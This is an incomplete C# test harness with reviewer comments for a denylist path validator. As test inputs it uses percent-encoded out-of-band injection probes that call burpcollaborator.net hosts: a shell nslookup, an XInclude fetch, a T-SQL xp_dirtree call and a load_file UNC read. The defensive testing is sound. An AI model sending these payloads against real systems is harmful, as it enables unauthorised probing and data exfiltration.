using System.Text.RegularExpressions;
/// <summary>
/// Console harness for ValidatePath: percent-decodes every entry of badUrls and
/// validUrls with Uri.UnescapeDataString, runs the validator on the decoded text and
/// prints the decoded text followed by the verdict.
/// </summary>
// NOTE(review): this listing is missing lines (braces, the badUrls / validUrls
// declarations, the end of each loop), so the point where the "bad" list stops and
// the "good" list starts cannot be read off the page.
public static void Main()
// The next four literals look like percent-encoded out-of-band probes from a scanner
// (each references a burpcollaborator.net host): a shell nslookup, an XInclude
// element, a T-SQL xp_dirtree call and a load_file() call. Once decoded, every one
// of them contains at least one character from ValidatePath's invalidChars
// (double quote or ampersand, double quote, semicolon / at sign / backslash, and
// backslash respectively), which is what the visible check rejects them on.
"%2f'%22%600%26nslookup%20-q%3dcname%20mc2oeuqe62sdobw7l00p3l95dwjw7r5f23tqje8.burpcollaborator.net.%26%60'",
"%3chcm%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a%2f%2f7em9gfsz8nuyqwysnl2a56bqfhlh97x8l08rwg.burpcollaborator.net%2ffoo%22%2f%3e%3c%2fhcm%3e",
"%2f')%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cbhwdjjv3brx2t01wqp5e8aeuilolcga41xpoce03.burpcollab'%2b'orator.net%5cllc'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20",
"%2f'%2b(select%20load_file('%5c%5c%5c%5czx01z7brrfdq9ohk6dl2oyuiy949s4qshv5mscg1.burpcollaborator.net%5c%5cyza'))%2b'",
// NOTE(review): the next two entries (an absolute URL and a bare host name) contain
// none of the six characters in invalidChars, so the character check shown in
// ValidatePath does not flag them. If they belong to the "bad" list, rejecting them
// needs a separate rule (for example refusing a scheme or a host-only value) -
// confirm against the full file.
"https://asdasdsadasd.co.uk",
"0972b8ns3gprlptliex30z6jaaga452tuhl4bs0.burpcollaborator.net",
// Plain report names/paths; neither contains a character from invalidChars.
"ReportService2010.asmx",
"/2nd TestReport with a relatively long name etc. blah"
Console.WriteLine("######## bad ########");
foreach (var url in badUrls) {
// Decodes exactly once. NOTE(review): the verdict is only meaningful if the code that
// later consumes the path applies the same single decode; validate the form of the
// value that is actually used.
var decodedUrl = Uri.UnescapeDataString(url);
var isValid = ValidatePath(decodedUrl);
// Output format is "<decoded text>: <True|False>".
Console.WriteLine(decodedUrl + ": " + isValid);
Console.WriteLine("######## good ########");
foreach (var url in validUrls) {
// Same decode-then-validate sequence as the loop over badUrls.
var decodedUrl = Uri.UnescapeDataString(url);
var isValid = ValidatePath(decodedUrl);
Console.WriteLine(decodedUrl + ": " + isValid);
/// <summary>
/// Denylist check for a path. Each test is folded into result with and-assign, so a
/// single failed test leaves the verdict false.
/// </summary>
/// <param name="path">Text to check; Main passes it already percent-decoded.</param>
// NOTE(review): the declaration of result, the return statement and the braces are
// not in this listing; presumably result starts as true and is what the method
// returns - confirm against the full file.
// NOTE(review): this is a denylist, so it blocks only what it names. Single quote,
// backtick, angle brackets, parentheses and ".." sequences are not on it; the test
// payloads in Main are caught because they also contain a listed character. If the
// set of characters a legitimate path may contain is known, an allowlist of that set
// is the stronger check.
public static bool ValidatePath(string path)
// A null or empty path fails. The and-assign does not short-circuit, so execution
// continues to the regex test below even when this test has already failed.
result &= !string.IsNullOrEmpty(path);
// Rejected characters: backslash, ampersand, double quote, at sign, dollar, semicolon.
var invalidChars = new char[] { '\\', '&', '"', '@', '$', ';' };
// Builds a character class from invalidChars; the Regex is constructed on every call.
// NOTE(review): Regex.Escape targets pattern text outside a character class and does
// not escape ']' or '-', so adding either to invalidChars would change the class
// instead of extending it. path.IndexOfAny(invalidChars) < 0 performs the same test
// with no pattern to get wrong.
var containsABadCharacter = new Regex("["
+ Regex.Escape(new string(invalidChars)) + "]");
// NOTE(review): Regex.IsMatch throws ArgumentNullException for a null input, so a
// null path raises here instead of yielding false, unless a guard sits on a line
// missing from this listing.
result &= !(containsABadCharacter.IsMatch(path));